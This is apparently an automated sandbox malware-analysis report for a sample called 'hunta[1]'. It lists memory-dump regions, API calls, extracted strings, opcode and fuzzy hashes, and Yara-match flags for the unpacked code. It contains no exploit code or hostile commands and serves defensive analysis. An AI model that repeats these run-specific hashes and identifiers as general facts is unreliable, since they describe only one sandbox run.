                                    • Instruction ID: ab253e449f8fd0c220344d3fc75c35d2f289ecd0e56f55e04675b9f49dad1c3e
                                    • Opcode Fuzzy Hash: 9b66cb97aace613b7b16aaaee8f9425dd7f36c1790a2a32a9497005413590343
                                    • Instruction Fuzzy Hash: D101D232614219AFCF05DF69DC45DAE3B6ADBC5330B340208F811EB291EB75ED91AB90
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00E81FDE
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID:
                                    • API String ID: 2659868963-0
                                    • Opcode ID: c43e6a2c52f10a9ab91064b4662632c6afd3483d7d672ce1e1d4c2cd8e04f89c
                                    • Instruction ID: 8e284151a410b9810a7ae53205a82c131659d526c254da4e6a4837a46bce8c57
                                    • Opcode Fuzzy Hash: c43e6a2c52f10a9ab91064b4662632c6afd3483d7d672ce1e1d4c2cd8e04f89c
                                    • Instruction Fuzzy Hash: AB01493680030D6BCB14BBA8DC018897BECDE01365B548221FF0DEA492FB70E999A7D1
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,00F5ADBC,?,?,00F73439,00000001,00000364,?,00000006,000000FF,?,00F5DD3B,?,?,?,?), ref: 00F73AF5
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 8e0e43ecc85dabc1f3c6749f91575188b3dd43fc2bdbf459d5c14865f69f3c66
                                    • Instruction ID: 59cb2061909fc8caf29dc3c87a6b38c65f74558986de7b18a7fe05ebbd602103
                                    • Opcode Fuzzy Hash: 8e0e43ecc85dabc1f3c6749f91575188b3dd43fc2bdbf459d5c14865f69f3c66
                                    • Instruction Fuzzy Hash: A0F0E936A4422576AB217A3A8C06B5B3B48DF81770B19C113EC4C97085CB24DE00B6E7
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00F5DD3B,?,?,?,?,?,00E82D8D,00F5ADBC,?,?,00F5ADBC), ref: 00F7451F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: d892e5083f3f2165d3a3ef8b951d4d9ad0654d81f4e65f33c4e46841476680bd
                                    • Instruction ID: cb2b17657a623b4b9d197f19c38868db51741b35911862c1f2951d55725f059a
                                    • Opcode Fuzzy Hash: d892e5083f3f2165d3a3ef8b951d4d9ad0654d81f4e65f33c4e46841476680bd
                                    • Instruction Fuzzy Hash: A3E09272A4122567EA213A799C01B6B3689DF457B0F1E8223EC4CA70D1DB64ED00B5A7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744999866.00000000059C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59c0000_hunta[1].jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 785fc114a2f96f74efe93cc29a7f1f873952e51f44a221ef06a4315c20b350d5
                                    • Instruction ID: 56a43a61d058ff8f67973a31833984e9a51f68801b9f0302d0af04b72947c816
                                    • Opcode Fuzzy Hash: 785fc114a2f96f74efe93cc29a7f1f873952e51f44a221ef06a4315c20b350d5
                                    • Instruction Fuzzy Hash: FB11C6EB188210BE6102D1851B9C5FEBE6FE5C7630B3188BFF807D6502F2C44E192272
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744999866.00000000059C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59c0000_hunta[1].jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dda01014435949fdeba920b6323516d61f93ba7c258c6172588644832c8de96d
                                    • Instruction ID: 4f3064e03e8cb175694377c1caeec2b9fcbdf39d7287d99eb7cf4e3f927a4906
                                    • Opcode Fuzzy Hash: dda01014435949fdeba920b6323516d61f93ba7c258c6172588644832c8de96d
                                    • Instruction Fuzzy Hash: 7501D6AB288210BE5102D189578C5FEFFAFA6C7631B3088BEF547D6502F1D44A091272
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744999866.00000000059C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59c0000_hunta[1].jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3a2868428b264b7fba942a12f9da717c1d697436f5dfc319eec9affd52bb81ab
                                    • Instruction ID: 41d53241d29116d2f664e0f1106ad8c4fb69d42719378f9d192c3bc2f581c67a
                                    • Opcode Fuzzy Hash: 3a2868428b264b7fba942a12f9da717c1d697436f5dfc319eec9affd52bb81ab
                                    • Instruction Fuzzy Hash: CBF049A768C214FF9301A5A5578D2EEBFAB68C7270F3498BDF80386407F18546095252
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744999866.00000000059C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59c0000_hunta[1].jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6078b07951343164deb9918a4bb9e54a66788fd184f4f23b29a28cac0613cd89
                                    • Instruction ID: 66025e515d25c65450698a3fc9509e19bf1fcf4c8dd581f4787c6ddcaa463c5c
                                    • Opcode Fuzzy Hash: 6078b07951343164deb9918a4bb9e54a66788fd184f4f23b29a28cac0613cd89
                                    • Instruction Fuzzy Hash: 34017BB354C300AFC301DBA5578C1ACBFA6AEC7230B3488AFE0428B103F69597265352
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744999866.00000000059C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59c0000_hunta[1].jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3964fc2f509bec0ceffb7a224ff2163ebe8ffca2f7b3aae737a21965784abfba
                                    • Instruction ID: 2fb0236733e8ce71874a679598558637b528f6e4a10552487b83df9234b69585
                                    • Opcode Fuzzy Hash: 3964fc2f509bec0ceffb7a224ff2163ebe8ffca2f7b3aae737a21965784abfba
                                    • Instruction Fuzzy Hash: C6F0E5A76C8204AE1201A2E1575D2FDBE5AA4C7570B7088BFF8079A802F1C14B5952A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $+$+Inf$-Inf$Inf$NaN$gfff
                                    • API String ID: 0-2577472133
                                    • Opcode ID: 2a99f7f2853bf9e3f2ecdb70eeedf5b0f9f7bdfac73671d280014f405bf538b3
                                    • Instruction ID: 83e117f737565c281914596df8c4721f64d4c42c898848524f9156d079fa423e
                                    • Opcode Fuzzy Hash: 2a99f7f2853bf9e3f2ecdb70eeedf5b0f9f7bdfac73671d280014f405bf538b3
                                    • Instruction Fuzzy Hash: 5082C0719087818FD725CF28C45036BBBE1AFDA354F048A5EE8CA97292D774C945EB82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
                                    • API String ID: 0-1885142750
                                    • Opcode ID: b7f4343af3bf642d70101135f96eacdf9134ea28baf7bfc0486aaed9570785cd
                                    • Instruction ID: 5fc91a512e3106891f6946a2250403ddf9aa64b5f3d7882afaf5340627875c17
                                    • Opcode Fuzzy Hash: b7f4343af3bf642d70101135f96eacdf9134ea28baf7bfc0486aaed9570785cd
                                    • Instruction Fuzzy Hash: F3024AB0F007049FE720CF54DC85B2677E0AF44715F14462CEE4A97292E7B9EA58EB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %s|%s$131$50500$type must be boolean, but is
                                    • API String ID: 0-353184664
                                    • Opcode ID: c067d13b9938ca753cf71e235fc3e1c8861f1b6b637f0db15ef24b0bb36dcb3c
                                    • Instruction ID: f0e9264e2ad035a4864c3b6afa957d35b17fcf6a172d270f3a905aa57fe3f63c
                                    • Opcode Fuzzy Hash: c067d13b9938ca753cf71e235fc3e1c8861f1b6b637f0db15ef24b0bb36dcb3c
                                    • Instruction Fuzzy Hash: 3123DC709002588FDF28DF68C958BEEBBB0AF05304F1891D9D449BB292DB759E85CF91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: /Kim$/Kim$type must be number, but is $type must be string, but is
                                    • API String ID: 0-1144537432
                                    • Opcode ID: b7d70fb336948ba4e615d9523782061ec6cb0e8c0b3ed56cc9f56cc183bad98d
                                    • Instruction ID: 43514a11b1b6dd714eaca3d5a8675a5c1760c02d46db51e03fa1ac6bb1471d30
                                    • Opcode Fuzzy Hash: b7d70fb336948ba4e615d9523782061ec6cb0e8c0b3ed56cc9f56cc183bad98d
                                    • Instruction Fuzzy Hash: 4491E571E0020C9FCB08DF6CD8917A9B7EAEB89314F14816EE919E7392D7759D05CB90
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Mtx_unlock
                                    • String ID:
                                    • API String ID: 1418687624-0
                                    • Opcode ID: 7922285f6ae6260304446e77812c016d6911fa2343d5cec5c6dc21da3e4c454e
                                    • Instruction ID: e73b732fe720fd9361e089db13160513c94019346a668c939150ec6ae7f2d56b
                                    • Opcode Fuzzy Hash: 7922285f6ae6260304446e77812c016d6911fa2343d5cec5c6dc21da3e4c454e
                                    • Instruction Fuzzy Hash: 0B3214B1A002099FDF08DF68DC85BEEB7B1EF45314F244258E815B72D2D775AA46CBA0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: File
                                    • API String ID: 0-749574446
                                    • Opcode ID: 81affbab9b9a4690a775d914d94c610141a92d791bed09272c478440978998ae
                                    • Instruction ID: 10c5ed980d1f15545512f4821f077b83ebba1d57a2fef736003f3f658940a83d
                                    • Opcode Fuzzy Hash: 81affbab9b9a4690a775d914d94c610141a92d791bed09272c478440978998ae
                                    • Instruction Fuzzy Hash: 01C1E170D043489BEF14DFA4CC45BEEBBB4EF05304F14016AE908BB292E775A944CBA2
                                    APIs
                                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,00F5C338,?,?,?,?,00E94A9B,?,00E9F03C), ref: 00F5C943
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$FilePreciseSystem
                                    • String ID:
                                    • API String ID: 1802150274-0
                                    • Opcode ID: de80456825cee2285c26d91c0002afffba42386c3b3fdd2b15f52093c95289da
                                    • Instruction ID: daa2df3b46918270beca487a953af9ecf19c5060c8f196218643700503eab406
                                    • Opcode Fuzzy Hash: de80456825cee2285c26d91c0002afffba42386c3b3fdd2b15f52093c95289da
                                    • Instruction Fuzzy Hash: 20D01237A46A3C9B8B112B98FC98BADBF9DAA45B7130C8115EE06572108A656C00FBD5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
